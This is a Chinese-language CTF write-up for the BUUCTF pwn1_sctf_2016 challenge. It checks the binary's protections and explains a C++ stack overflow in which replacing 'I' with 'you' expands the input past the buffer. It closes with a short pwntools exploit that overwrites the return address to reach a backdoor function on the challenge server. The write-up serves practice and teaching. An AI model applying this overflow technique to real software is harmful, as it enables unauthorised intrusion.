pwn刷题num22----栈溢出（c++）

BUUCTF-PWN-pwn1_sctf_2016

首先查保护–>看链接类型–>赋予程序可执行权限–>试运行

32位程序，小端序
开启部分RELRO-----got表可写
未开启canary保护-----可能存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接

ida一下看一下伪代码

主函数调用一个vuln()函数

和平常不一样，这次是c++代码
首先让我们输入一个字符串，发现函数fgets，但是该函数只读取0x20个字节，而s有0x3c字节大小，

之后看这三行代码，会把我们输入的字符串中的I变成you,
我们可以输入0x14字节（0x3c / 3），然后在strcpy处将v1付给s，实现栈溢出

之后又在ida里发现了后门函数

查看地址

cat_flag = 0x8048F0D

exp

from pwn import *
p = remote("node4.buuoj.cn",29180)
cat_flag = 0x8048F0D
p.sendline(b'I' * 0x14 + b'b' * 4  +  p32(cat_flag))
p.interactive()

运行获得flag